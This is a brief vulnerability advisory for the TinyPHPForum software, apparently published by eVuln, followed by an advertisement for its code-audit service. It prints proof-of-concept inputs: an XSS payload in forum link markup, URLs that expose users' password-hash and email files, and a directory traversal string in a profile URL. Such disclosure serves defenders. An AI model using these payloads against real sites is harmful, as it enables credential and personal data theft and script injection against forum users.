PoC/Exploit for Multiple Vulnerabilities in TinyPHPForum
Published Proof of Concept code - Multiple Vulnerabilities in TinyPHPForum.
- Description
- Available
- Solution
- Not available - check vendor's website
1. Arbitrary script execution. Example:
XSS code: [a]javascript:alert("hello")[/a]
2. Users information disclosure:
http://host/tpf/users/anyuser.hashhttp://host/tpf/users/anyuser.email
3. Directory Traversal Example:
Users profile.
http://host/tpf/profile.php?action=view&uname=../../username
Order Source Code Analysis made by eVuln
You may order PHP code audit of a website or web application made by eVuln team.The work will be done by experts in web application security.